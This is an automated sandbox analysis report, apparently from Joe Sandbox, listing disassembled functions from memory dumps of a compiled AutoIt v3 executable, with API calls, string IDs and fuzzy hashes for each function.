                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogLongNtdllProc_Window
                    • String ID:
                    • API String ID: 2065330234-0
                    • Opcode ID: 4501d7b220bd76ea42d58781dbcbb23ac9881269ec46e6eb3622f86b2abcd5df
                    • Instruction ID: dd8c401780b71fcb2a9b238189f0845240dc986d05a2259ba53227ffcf0223d4
                    • Opcode Fuzzy Hash: 4501d7b220bd76ea42d58781dbcbb23ac9881269ec46e6eb3622f86b2abcd5df
                    • Instruction Fuzzy Hash: 93E0EC35100208FBCF05AF90DC51F683B2AFB48354F10C418FA494B2A1CA72A922EB60
                    Function 00CFCB50 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00CFCB75
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 40dc968f1151b5f52bee004004e340ce39fd3fbd55454204405a2b9a80d4c8a2
                    • Instruction ID: 518788723e125caf530aed55963b06e03fa27a57e17740ca92d33ae83ba74c44
                    • Opcode Fuzzy Hash: 40dc968f1151b5f52bee004004e340ce39fd3fbd55454204405a2b9a80d4c8a2
                    • Instruction Fuzzy Hash: 45E0427524424DAFDB01DF88D885E9A3BA5EB1D700F014054FA1557362CB71A820EB62
                    Function 00CFCB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtdllDialogWndProc_W.NTDLL ref: 00CFCBA4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: DialogNtdllProc_
                    • String ID:
                    • API String ID: 3239928679-0
                    • Opcode ID: 1af43cc8738db50079e8d12e6a75bf3789c15986cd560861d8af7bd32081611b
                    • Instruction ID: 5f2becdb93b32c3a1baff75ce5fdf9dc69928ee5934931404389a6fe4d5e3737
                    • Opcode Fuzzy Hash: 1af43cc8738db50079e8d12e6a75bf3789c15986cd560861d8af7bd32081611b
                    • Instruction Fuzzy Hash: 86E0427524024DEFDB01DF88D985E9A3BA5EB1D700F018054FA1547362CB71A860EBA2
                    Function 00C716B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C72612: GetWindowLongW.USER32(?,000000EB), ref: 00C72623
                      • Part of subcall function 00C7201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00C720D3
                      • Part of subcall function 00C7201B: KillTimer.USER32(-00000001,?,?,?,?,00C716CB,00000000,?,?,00C71AE2,?,?), ref: 00C7216E
                    • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,00C71AE2,?,?), ref: 00C716D4
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                    • String ID:
                    • API String ID: 2797419724-0
                    • Opcode ID: 6fab60ab6c8047291bd2b0e794e678f131977c7daffad45086b88c5f57bc829d
                    • Instruction ID: 791fd8fe067907303f2a79cc57f646421b4e3efe748e54ee0d3590b6051dd5f7
                    • Opcode Fuzzy Hash: 6fab60ab6c8047291bd2b0e794e678f131977c7daffad45086b88c5f57bc829d
                    • Instruction Fuzzy Hash: FDD01270140308B7DA102B50DC17F5D3A19DB14790F40C021BA09291D3CAB1A810F569
                    Function 00CB2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                    Download Yara Rule
                    APIs
                    • GetUserNameW.ADVAPI32(?,?), ref: 00CB2242
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: NameUser
                    • String ID:
                    • API String ID: 2645101109-0
                    • Opcode ID: 4b121ef616beb42abdf32ecd3d22325aae519010457389f4fc7c38bc47ffdec8
                    • Instruction ID: 8eab4f17f2cd1fbcab4c6486f9f57b8e75853b4f80aa0269313fb4796ca180b6
                    • Opcode Fuzzy Hash: 4b121ef616beb42abdf32ecd3d22325aae519010457389f4fc7c38bc47ffdec8
                    • Instruction Fuzzy Hash: A0C04CF1810109DBDB05DB90D998EFE77BCAB04304F144055A501F2100DB749B44CE71
                    Function 00C9A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C9A36A
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 715b06ad4cd9bb06e418b922134e54db3db614d46343a3f6899f98745279acf6
                    • Instruction ID: 902542f15faa6bbdff30e871c8a12a585ed39a35907e6b133a4978fd106bd6d6
                    • Opcode Fuzzy Hash: 715b06ad4cd9bb06e418b922134e54db3db614d46343a3f6899f98745279acf6
                    • Instruction Fuzzy Hash: 9AA0123000010CA78A001B41EC045587F6DDA001907004020F40C40031873254118581
                    Function 00C88A0E Relevance: .6, Instructions: 608COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 89b848542918b4807727e267534b154f83c7f56e1a6edaa6c431cdf59c5885d7
                    • Instruction ID: f3300719b81c6cafcdd5e489713442c2f682129d7d9b89d63a8ceac2dc6fd5f4
                    • Opcode Fuzzy Hash: 89b848542918b4807727e267534b154f83c7f56e1a6edaa6c431cdf59c5885d7
                    • Instruction Fuzzy Hash: 9A223B30905615CBCF38AB19C484B7DB7A1EF41308FA9446ED462CBA95DB34EEC9CB64
                    Function 00C92405 Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: 4e3f9bbfed6c777771809c20d50da34d7d130bdff6e89329ebf851dca6a0c105
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 41C181322050930ADF2D867AD47913EBAE15BA27B131E075DE8F3DB5D5EF20D624E620
                    Function 00C9283A Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 0f8cf55cd0e65934bac73b9cb22d4e8abc5f802f52ba6422de80de5c72f23b7d
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: 53C170332051930ADF6D463A943913EBBE15BA27B131E076DE8F3DB5D4EF20D624A620
                    Function 00C91BB8 Relevance: .3, Instructions: 323COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction ID: 2bed4471a4ad3893e2d3f021005dcffa03ba3406952ecc0962ac61975f0af7fc
                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                    • Instruction Fuzzy Hash: 77C1733620919309DF6D467A943A13EBBE15BA27B131E076DECB3CB5D4EF20D624D620
                    Function 00CF37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,00CFF910), ref: 00CF38AF
                    • IsWindowVisible.USER32(?), ref: 00CF38D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: fbba09ba3e787d40360d8a002bbc414cc9a42d8475f729e92af018f3cdb39f38
                    • Instruction ID: 9e0da002150656c3cbe16efff1948833a6f9782d5292dd83766b240a6f3fd1b7
                    • Opcode Fuzzy Hash: fbba09ba3e787d40360d8a002bbc414cc9a42d8475f729e92af018f3cdb39f38
                    • Instruction Fuzzy Hash: B5D1BD30204249AFCB14EF11C495A7EBBA1EF94354F10845DF9865B3A2CB71EE4AEB52
                    Function 00CFA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 00CFA89F
                    • GetSysColorBrush.USER32(0000000F), ref: 00CFA8D0
                    • GetSysColor.USER32(0000000F), ref: 00CFA8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 00CFA8F6
                    • SelectObject.GDI32(?,?), ref: 00CFA905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00CFA930
                    • GetSysColor.USER32(00000010), ref: 00CFA938
                    • CreateSolidBrush.GDI32(00000000), ref: 00CFA93F
                    • FrameRect.USER32(?,?,00000000), ref: 00CFA94E
                    • DeleteObject.GDI32(00000000), ref: 00CFA955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00CFA9A0
                    • FillRect.USER32(?,?,?), ref: 00CFA9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 00CFA9FD
                      • Part of subcall function 00CFAB60: GetSysColor.USER32(00000012), ref: 00CFAB99
                      • Part of subcall function 00CFAB60: SetTextColor.GDI32(?,?), ref: 00CFAB9D
                      • Part of subcall function 00CFAB60: GetSysColorBrush.USER32(0000000F), ref: 00CFABB3
                      • Part of subcall function 00CFAB60: GetSysColor.USER32(0000000F), ref: 00CFABBE
                      • Part of subcall function 00CFAB60: GetSysColor.USER32(00000011), ref: 00CFABDB
                      • Part of subcall function 00CFAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CFABE9
                      • Part of subcall function 00CFAB60: SelectObject.GDI32(?,00000000), ref: 00CFABFA
                      • Part of subcall function 00CFAB60: SetBkColor.GDI32(?,00000000), ref: 00CFAC03
                      • Part of subcall function 00CFAB60: SelectObject.GDI32(?,?), ref: 00CFAC10
                      • Part of subcall function 00CFAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00CFAC2F
                      • Part of subcall function 00CFAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CFAC46
                      • Part of subcall function 00CFAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00CFAC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 9478b64627b16432615f81e12831619fd4d8b182328077133e145e2d36064915
                    • Instruction ID: d5aac3c704fc3acbf77c16e6058921ab02e112c86570bca9a33034409fce7fcc
                    • Opcode Fuzzy Hash: 9478b64627b16432615f81e12831619fd4d8b182328077133e145e2d36064915
                    • Instruction Fuzzy Hash: 4CA17AB2008305AFD7509F64DC08B6FBBA9FF88321F104A2DFA66961A0D771D946CB53
                    Function 00CE77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 00CE77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CE78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CE78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CE7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CE7946
                    • GetClientRect.USER32(00000000,?), ref: 00CE7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CE7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CE79A5
                    • GetStockObject.GDI32(00000011), ref: 00CE79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 00CE79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CE79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CE79D2
                    • DeleteDC.GDI32(00000000), ref: 00CE79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CE7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CE7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CE7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CE7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CE7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CE7AAE
                    • GetStockObject.GDI32(00000011), ref: 00CE7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CE7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CE7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: b74c8c1df2cd6ba685a9153aef83f6709f9a6f1609e5f108f86fde5ff39d44ea
                    • Instruction ID: ddc9b47a77699e182b406ca53ea882ce57bba5abed40b7fa2d31db91aa6f991c
                    • Opcode Fuzzy Hash: b74c8c1df2cd6ba685a9153aef83f6709f9a6f1609e5f108f86fde5ff39d44ea
                    • Instruction Fuzzy Hash: 61A15E71A40219BFEB149BA4DC4AFAF7BA9EF44710F118118FA15E72E0CB70AD01CB65
                    Function 00CDAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 00CDAF89
                    • GetDriveTypeW.KERNEL32(?,00CFFAC0,?,\\.\,00CFF910), ref: 00CDB066
                    • SetErrorMode.KERNEL32(00000000,00CFFAC0,?,\\.\,00CFF910), ref: 00CDB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: 7406318d109117b850813881e275104e4460c76ca4e508b2a50020c2f335835e
                    • Instruction ID: 735449493270a0b7b5bf1b9fe0ac491233a2b481724ca4f1cbb2d10d0ef32b60
                    • Opcode Fuzzy Hash: 7406318d109117b850813881e275104e4460c76ca4e508b2a50020c2f335835e
                    • Instruction Fuzzy Hash: B851F330680309EFCF04DB15D992D7D73B1EF243457228027E62AA7390C775AE4AEB66
                    Function 00C76A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2026886010.0000000000C71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true
                    • Associated: 00000000.00000002.2026874180.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000D2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026886010.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026987372.0000000000DBC000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2026999814.0000000000DBD000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_c70000_jv4ri.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: cb8ea46e306ba0519ddb617652bf0d1f865b670d94407ab32ce5aea497c68ecd
                    • Instruction ID: 725687273e58411d06bbf7253d908adcd8347474e91cf15f7f5dd35abdd8ce4a
                    • Opcode Fuzzy Hash: cb8ea46e306ba0519ddb617652bf0d1f865b670d94407ab32ce5aea497c68ecd
                    • Instruction Fuzzy Hash: 62812A70600646BBCF21AB61CC87FBE7768EF12700F048025FD59AA1C2EB65DB55F2A1
